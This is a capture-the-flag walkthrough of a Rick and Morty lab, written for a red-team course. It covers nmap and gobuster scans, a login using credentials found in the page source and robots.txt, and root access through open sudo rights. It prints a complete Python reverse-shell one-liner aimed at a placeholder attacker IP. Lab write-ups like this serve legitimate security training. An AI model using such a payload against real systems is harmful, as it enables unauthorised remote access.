A Rick and Morty CTF. Help turn Rick back into a human!
This walkthrough is written as a part of Master's certificate in cybersecurity (Red Team) that I am pursuing from HackeU.
Performing a nmap scan we see that we have 2 ports open(22 and 80). So that's means we have a webpage also
nmap -sS -sV <IP>
We have a webpage
Checking source code and robots.txt
We get the username in the source code of the page.
In robots.txt we have a string that might come in handy later.
Running gobutser and found out the login page.
gobuster dir -u <IP> -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,htm
We get a login page and we use the username and password we found earlier from the source code and the robots.txt
We get an option to input commands and on doing an
ls the command we see all the files.
Instead of giving commands here, i choose to get a python reverse shell.
Checking if python exists
And yes it has python3
Now executing our payload
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<Attacker_IP>”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
AND Volia!!! we get a reverse shell
Found the first flag easily
The second flag is in the user rick directory
Checking the permissions and we find out that we can run all the commands on the system as sudo
And easily we become root
In the root directory, we find the root flag as 3rd.txt
and we successfully finished the room.
Do leave some claps if this Walkthrough helped you.